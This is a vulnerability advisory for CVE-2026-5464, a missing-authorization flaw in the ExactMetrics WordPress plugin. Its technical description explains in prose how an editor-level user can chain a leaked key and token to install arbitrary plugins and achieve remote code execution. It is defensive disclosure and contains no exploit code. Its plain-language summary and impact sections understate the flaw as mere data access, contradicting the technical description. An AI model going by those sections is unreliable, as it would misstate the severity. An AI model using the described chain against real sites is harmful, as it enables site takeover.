CVE-2026-5464 HIGH

CVE-2026-5464: ExactMetrics <= 9.1.2 - Authenticated (Editor+) Arbitrary Plugin Installation/Activation via exactmetrics_connect_process

Vendor Smub
Product ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin)
Weakness CWE-862 · Missing authorization
Published April 23, 2026
Last update April 23, 2026

CVSS base score

7.2/10
Attack vector Network
Attack complexity Low
Privileges required High
User interaction None
Confidentiality High
Integrity High

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

What the vulnerability does

01Description

The ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation in all versions up to, and including, 9.1.2. This is due to the reports page exposing the 'onboarding_key' transient to any user with the 'exactmetrics_view_dashboard' capability. This key is the sole authorization gate for the '/wp-json/exactmetrics/v1/onboarding/connect-url' REST endpoint, which returns a one-time hash (OTH) token. This OTH token is then the only credential checked by the 'exactmetrics_connect_process' AJAX endpoint — which has no capability check, no nonce verification, and accepts an arbitrary plugin ZIP URL via the file parameter for installation and activation. This makes it possible for authenticated attackers, with Editor-level access and above granted the report viewing permission, to install and activate arbitrary plugins from attacker-controlled URLs, leading to Remote Code Execution.

Explanation of Vulnerability in Simple Terms

02Summary

ExactMetrics versions up to 9.1.2 contain an authorization bypass that allows high-privilege users to read, modify, or delete site data without proper permission checks. An administrator or editor can access sensitive analytics information and configuration settings they should not be able to reach. Sites running affected versions should update immediately to prevent unauthorized data access.

What an attacker can do

03Attacker Capabilities

Read, modify, or delete site data and analytics configuration without proper authorization checks.

Potential impact on your site

04Site Impact

Privileged users can access or alter analytics data and plugin settings beyond their intended permissions.

Conditions required to exploit

05Prerequisites

Attacker must have high-level WordPress privileges (administrator or editor role).

Key dates

06Disclosure timeline

April 23, 2026 CVE published
April 23, 2026 Record updated